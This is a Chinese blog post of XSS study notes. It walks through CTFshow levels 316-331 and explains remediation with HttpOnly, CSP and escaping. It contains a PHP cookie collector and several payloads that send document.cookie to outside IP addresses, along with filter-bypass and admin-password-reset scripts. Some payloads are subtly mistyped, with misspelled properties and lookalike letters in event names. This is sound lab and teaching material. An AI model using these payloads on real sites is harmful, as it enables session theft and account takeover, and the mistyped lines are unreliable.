XSS学习笔记(一)、CTFSHOW-316到331关卡绕过WP

已于 2022-10-30 14:53:05 修改
阅读量1.6k 收藏 4
点赞数
分类专栏: 基础的渗透测试 文章标签: xss 学习 网络
于 2022-10-28 20:05:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63917373/article/details/127578086
版权

#知识点:

1、XSS跨站-过滤绕过-便签&语句&符号等

2、XSS跨站-修复方案-CSP&函数&http_only等

1、原理

指攻击者利用网站程序对用户输入过滤不足,输入可以显示在页面上对其他用户造成影响的HTML代码,从而盗取用户资料、利用用户身份进行某种动作或者对访问者进行病毒侵害的一种攻击方式。通过在用户端注入恶意的可执行脚本,若服务器对用户的输入不进行处理或处理不严,则浏览器就会直接执行用户注入的脚本。

-数据交互的地方

get、post、headers

反馈与浏览

富文本编辑器

各类标签插入和自定义

-数据输出的地方

用户资料

关键词、标签、说明

文件上传

2、分类

反射型(非持久型)

存储型(持久型)

DOM型

mXSS(突变型XSS)

UXSS(通用型xss)

Flash XSS

UTF-7 XSS

MHTML XSS

CSS XSS

VBScript XSS

3、危害

网络钓鱼,包括获取各类用户账号;

窃取用户cookies资料,从而获取用户隐私信息,或利用用户身份对网站执行操作;

劫持用户(浏览器)会话,从而执行任意操作,例如非法转账、发表日志、邮件等;

强制弹出广告页面、刷流量等;

网页挂马;

进行恶意操作,如任意篡改页面信息、删除文章等;

进行大量的客户端攻击,如ddos等;

获取客户端信息,如用户的浏览历史、真实ip、开放端口等;

控制受害者机器向其他网站发起攻击;

结合其他漏洞,如csrf,实施进一步危害;

提升用户权限,包括进一步渗透网站;

传播跨站脚本蠕虫等

4、修复

1、过滤一些危险字符

2、HTTP-only Cookie

3、设置CSP(Content Security Policy)

4、输入内容长度限制,转义等

#XSS跨站系列内容:

1、XSS跨站-原理&分类&手法

2、XSS跨站-探针&利用&审计

3、XSS跨站-另类攻击手法利用

4、XSS跨站-防御修复&绕过策略

#实践

服务器准备一个文件,接受cookie get.php

<?php

$cookie=$_GET['c'];

$myfile=fopen("cookie.txt","w+");

fwrite($myfile,$cookie);

fclose($myfile);

?>

xss语句:<script>window.location.href='http://HOST/get.php?c='+document.cookiie</script>

<script>window.location.href='http://43.143.199.133:8081/get.php?c=' document.cookie</script>

js功能中获取cookie:document.cookie

https://ctf.show/

  • XSS绕过-CTFSHOW-316到331关卡绕过WP

  • XSS修复-过滤函数&http_only&CSP&长度限制

#XSS绕过-CTFSHOW-361到331关卡绕过WP

绕过:https://xz.aliyun.com/t/4067

316-反射型-直接远程调用

<script>window.location.href='http://43.143.199.133:8081/get.php?c='+document.cookie</script>

317-反射型-过滤<script>

<img src=1 onerror=window.location.href='http://43.143.199.133:8081/get.php?c='+document.cookie;>

318 319-反射型-过滤<img>

<svg onload="window.location.href='http://43.143.199.133:8081/get.php?c='+document.cookie;">

320-326-反射型-过滤空格

<svg/onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">

327-存储型-无过滤

<script>window.location.href='http://47.94.236.117/get.php?c='+document.cookie</script>

328-存储型-注册插入JS

<script>window.location.href='http://47.94.236.117/get.php?c='+document.cookie</script>

329-存储型-失效凭据需1步完成所需操作

<script>

$('.laytable-cell-1-0-1').each(function(index,value){

if(value.innerHTML.indexOf('ctf'+'show')>-1){

window.location.href='http://47.94.236.117/get.php?c='+value.innerHTML;

}

});

</script>

330-存储型-借助修改密码重置管理员密码(GET)

<script>window.location.href='http://127.0.0.1/api/change.php?p=123';</script>

331-存储型-借助修改密码重置管理员密码(POST)

<script>$.ajax({url:'http://127.0.0.1/api/change.php',type:'post',data:{p:'123'}});</script>

#XSS修复-过滤函数&http_only&CSP&长度限制

1、过滤一些危险字符,以及转义& < > " ' 等危险字符

自定义过滤函数引用

2、HTTP-only Cookie

https://www.php.cn/php-ask-457831.html

php.ini设置或代码引用

php.ini配置文件中引用:session.cookie_httponly =1

代码中引用:ini_set("session.cookie_httponly", 1);

3、设置CSP(Content Security Policy)

https://blog.csdn.net/a1766855068/article/details/89370320

header("Content-Security-Policy:img-src 'self' ");

4、输入内容长度限制,实体转义等

xss绕过总结

1.大小写绕过

注意在html里不区分大小写 所以标签如果别过滤 可以采用大小写绕过的方式

代码如下(示例):

<script>alert(“xss”);</script>

<ScRipt>ALeRt(“XSS”);</sCRipT>

2.空格/回车(换行符)/Tab

当过滤掉了Javascript等敏感字符串时就对字符串进行添加空格,换行或tab,此处利用js自身的性质:js通常用分号结尾,当解析到完整语句并且行尾存在换行符的情况下就可以忽略掉分号,若解析确定不是完整语句,则会继续处理,直到语句结束或出现分号。

例如下列语句,我们利用空格将语句分隔成了两部分,解析引擎解析确定到的不是完整的语句,JavaScript则会继续进行处理直到这个语句结束,利用换行符和tab同理

代码如下(示例):

<img src="java  script:alert(‘xss‘);" width=100>

或者

<img src="javascript: alert(‘xss‘);" width=100>

1.<img>

payload:<img src=1 οnerrοr=alert("xss");> //如果找不到图片1,报错

2.<input>

payload: <input οnfοcus="alert('xss');">

<input οnblur=alert("xss") autofocus><input autofocus> #竞争焦点,触发onblur事件

<input οnfοcus="alert('xss');" autofocus> #通过autofocus属性执行本身的focus事件

3.<details>

payload: <details οntοggle="alert('xss');">

<details open οntοggle="alert('xss');"> #使用open属性触发ontoggle事件

4.<svg>

payload: <svg οnlοad=alert("xss");>

5.<iframe>

payload: <iframe οnlοad=alert("xss");></iframe>

6.<body>

payload: <body/οnlοad=alert("xss");>

事件描述

onclick 在用户使用鼠标左键点击对象时触发

ondblclick 用户双击对象时触发

onmousedown 用户用任何鼠标按键单击对象时触发

onmouseenter/onmouseover 用户将鼠标指针移动到对象内时触发

onmouseleave/onmouseout 用户将鼠标移出对象边界时触发

onmousemove 用户将鼠标划过对象时触发

onmouseup 用户在鼠标位于对象之上时释放鼠标按钮触发

onmousewheel 鼠标滚轮按钮旋转时触发

onpaste 用户粘贴数据以便从剪切板向文档传输数据在目标对象上时触发

onpropertychange 在对象上发生对象属性更改时触发

onkeydown 用户按下键盘按键时触发

onerror 装载文档或图像的过程中发生错误时触发

onload 加载完毕自动触发

大飞先生
关注
专栏目录
CTFshow XSS(web316-333)
Kradress的博客
03-18 795
这里我们发现管理员才能查看用户名和密码,如果我们在注册的时候写入xss的payload,就会在用户管理界面执行我们的xss代码。这题没有过滤什么,但是如果用img的话,拿不到flag,但是referer是bot,我猜测bot触发不了img的。试试用admin的cookie修改密码,但是没有用,可能cookie失效了。这题拿cookie也看不到flag了,不过多了一个修改密码选项。随便注册一个用户test,余额只有6块,买flag要9999元。发现输出为空,说明被题目限制了,但是。可以用frame注入。
[WP/CTFshow]XSS Web316-333
車鈊的博客
07-11 1782
CTFSHOW WP 题目的原理就是靶机的bot每隔一段时间访问输入的内容,模拟了反射型XSS 316.需要配套接收端XSS脚本 如果未过滤script且对外部资源加载无限制的情况下,可以指定src为精心准备的JS文件,使其加载,产生携带COOKIE的请求。 本解法直接将产生请求写在了表层。 <script>document.location.href='http://xxxxxxxxxxxxxxxxxxxx/x.php?1='+document.cookie</script> 3
CTF Web】Pikachu xss之过滤 Writeup(GET请求+反射型XSS+过滤绕过
最新发布
HEX9CF的技术博客
10-03 385
Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型:1.反射性XSS;2.存储型XSS;3.DOM型XSS;XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。
ctfshow_web316-326_反射型XSS
记录学习成长之路上的点点滴滴
05-08 1052
2023/05/07 ctfshow刷题 web316-326 反射型XSS
ctfshow-xss
Vincent0sen的博客
09-13 346
ctfshow刷题记录
CTFSHOW-XSS
byname1的博客
03-10 1113
说来惭愧,很久没发博客了,主要是寒假有点摆了,然后ctfshow很多类型我在同时刷,这几天比如sql,xxe,php反序列化,jwt这些我就陆陆续续地能发出来了。文末有参考WP,这两篇WP对于没学过JS的我做题用处很大,先谢过Y4师傅和bfeng师傅了!!!
ctfshow XSS
quan9i的博客
06-28 1539
ctfshow XSS 316-333
第十二节 XSS 过滤器绕过-01
09-15
XSS 过滤器绕过技术详解 XSS(Cross-Site Scripting,跨站脚本攻击)是一种常见的 Web 应用程序安全漏洞,攻击者可以通过插入恶意脚本来盗取用户信息、破坏网站操作等。为防止 XSS 攻击,开发者通常会使用 XSS 过滤...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
这里的"菜狗杯"可能是指比赛的昵称或名称,暗示这是一个初级到中级难度的竞赛,适合新手和进阶者参与。 【描述】"CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$" 描述部分并未提供具体细节,但我们可以推测这道...
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序未能充分地验证和转义...
第十一节 绕过替换script和on事件的XSS-01
09-15
绕过替换script和on事件的XSS攻击是XSS攻击的一种变体,攻击者通过使用特殊的字符串和payload来绕过Web应用的安全机制。 一、XSS漏洞发现 在XSS攻击中,攻击者首先需要发现Web应用中的漏洞,通常通过构造特殊的...
xss绕过尖括号和双括号_xss防御及绕过-小记1
weixin_29315091的博客
12-23 3059
XSS搞安全的应该都很熟悉。本次并不是说其原理,仅是分享下在测试过程中遇到的案例。本人小白一枚,所以案例大佬们看着可能非常简单,就当是记录下自己笔记吧,不喜勿喷哈。。关于xss的防御,基本上都是采用输入过滤,输出编码。最近做的一个项目中的某个模块中,进行了输入过滤,采用跳转的形式。比如遇到<>或alert,响应包就会302跳转到固定网址。遇到这种黑名单的可以尝试各种绕过。有些输入是在i...
ctfshow XSS web316~web333
shinygod的博客
11-25 1962
ctfshow XSS web316~web333
XSS绕过
m0_59855041的博客
09-04 265
alert(1)
ctfshow-xss(web316-web330)
m0_72125469的博客
07-03 1367
web317讲解相当细致精致练习XSSweb316这道题估计陆陆续续弄了半天 因为xss可以说基本不会 还好最终彻彻底底明白了首先这道题是反射性xss 也就是必须点击某一个xss链接 才能达到xss效果这道题的意思就是 写一个祝福语生成链接发送给朋友 这个祝福语的位置就是我们实现XSS的位置已知:flag在BOT(程序,机器人)的cookie中并且 生成的链接后端BOT会每隔一段时间访问所以 要构造一个含有XSS的链接 使得管理员只要访问就能获取BOT的cookie。
ctfshowXSS
njh18790816639的博客
05-19 352
XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java、 VBScript、ActiveX、 Flash 或者甚至是普通的HTML。攻击成功后,攻击者可能得到包括但不限于更高的权限(如执行一些操作)、私密网页内容、会话和cookie等各种内容。 大致的介绍一下XSS漏洞!此时我们可以使用这个xss平台***https://xss.pt/xss.php*** 注.
CTFShow Xss
paidx0
08-12 1459
CTFShow Xss学习) 简单介绍一下Xss 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞关键就是寻找参数未过滤的输出函数。 常见的输出函数有: echo printf print print_r sprintf die var-dump var_export xss 分类:(三类) 反射型XSS:<非持久化> 攻击者事先制作好攻击链接, 需要欺
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
Jay17的博客
09-28 5343
Ctfshow web入门 XSS篇 web316-web333 详细题解 全
ctfshow-web-web红包题
07-14
### 回答1: ctfshow-web-web红包题是一道CTF比赛中的网络安全题目。这道题目的背景是一个在线购物网站,要求我们通过安全漏洞来获得网站的红包。 首先,我们可以检查网站的源代码,寻找可能存在的漏洞。在网站的前端页面中,我们注意到了一个提交订单的功能,并且发现了其中一个参数可以被用户任意修改。这可能导致一个被称为SQL注入的漏洞。 我们试图通过在参数中插入恶意代码来进行SQL注入攻击。我们发现当我们输入`' or 1=1 -- `时,查询结果会返回所有订单记录,而不仅仅是当前用户的订单。这表明成功利用了SQL注入漏洞。 接下来,我们要尝试进一步利用这个漏洞来获取网站的红包。我们可以通过构建特制的SQL语句来绕过登录过程,直接获取红包的信息。 最终,我们成功地利用了网站存在的漏洞,获取到了红包的相关信息。这个过程展示了在网络安全竞赛中,如何通过分析代码和利用漏洞来实现攻击的目标。 在这个过程中,我们需要具备对SQL注入漏洞的理解和掌握,并且需要有一定的编程和网络安全知识。通过解决这样的题目,我们可以提高我们对网络安全攻防的认识和技能,以更好地保护网络安全。 ### 回答2: ctfshow-web-web红包题是一个CTF(Capture the Flag)比赛中的Web题目,目标是通过分析Web应用程序的漏洞来获取红包。CTF比赛是一种网络安全竞赛,在这种比赛中,参赛者需要通过解决各种不同类型的安全挑战来积分。 该题目中的Web应用程序可能存在一些漏洞,我们需要通过分析源代码、网络请求和服务器响应等信息来找到红包的位置和获取红包的方法。 首先,我们可以查看网页源代码,寻找可能的注入点、敏感信息或其他漏洞。同时,我们还可以使用开发者工具中的网络分析功能来查看浏览器和服务器之间的通信内容,找到可能存在的漏洞、密钥或其他敏感信息。 其次,我们可以进行输入测试,尝试不同的输入来检查是否存在注入漏洞、文件包含漏洞、路径遍历漏洞等。通过测试和观察响应结果,我们可以得到一些重要的信息和线索。 最后,我们可以分析服务器响应和错误信息,查找可能存在的网站配置错误、逻辑漏洞或其它任何可以利用的安全问题。此外,我们还可以使用常见的Web漏洞扫描工具,如Burp Suite、OWASP ZAP等,来辅助我们发现潜在的漏洞。 通过以上的分析和测试,我们有可能找到获取红包的方法。然而,具体的解题方法还需要根据题目中的具体情况来确定。在CTF比赛中,每个题目的设置都可能不同,解题的方法和思路也会有所差异。因此,在解题过程中,要保持敏锐的观察力和灵活的思维,尝试不同的方法和技巧,才能成功获取红包并完成任务。 ### 回答3: ctfshow-web-web红包题是一个CTF比赛中的网络题目,其目标是寻找并利用网页内的漏洞,获取红包。 首先,我们需要分析该网页的源代码,寻找可能存在的漏洞。可以通过审查元素、浏览器开发者工具等方式进行源代码分析。 其中,可能存在的漏洞包括但不限于: 1. 文件路径遍历漏洞:通过对URL的参数进行修改,尝试访问其他目录中的文件。 2. XSS漏洞:通过在用户输入的地方注入恶意代码,实现攻击者想要的操作。 3. SQL注入漏洞:通过修改数据库查询参数,获取未授权的数据。 4. 文件上传漏洞:上传恶意文件并执行。 一旦发现漏洞,我们需要进一步利用它们来获取红包。例如,如果存在文件路径遍历漏洞,我们可以尝试通过修改URL参数的方式,访问网站服务器上存放红包的文件目录,获取目录中的文件。 如果存在XSS漏洞,我们可以尝试在用户输入的地方注入一段JavaScript代码,以获取网页中的敏感信息或执行一些恶意操作,如窃取cookies。 如果存在SQL注入漏洞,我们可以尝试通过修改数据库查询参数,获取未授权的数据,如红包的具体位置或密码。 如果存在文件上传漏洞,我们可以尝试上传一个特殊设计的恶意文件,以执行任意命令或获取服务器上的文件。 综上所述,ctfshow-web-web红包题需要我们深入分析网页代码,发现可能存在的漏洞,并利用这些漏洞获取红包。这个过程需要我们对常见的漏洞类型有一定的了解,并具备相关的漏洞利用技术。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

大飞先生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值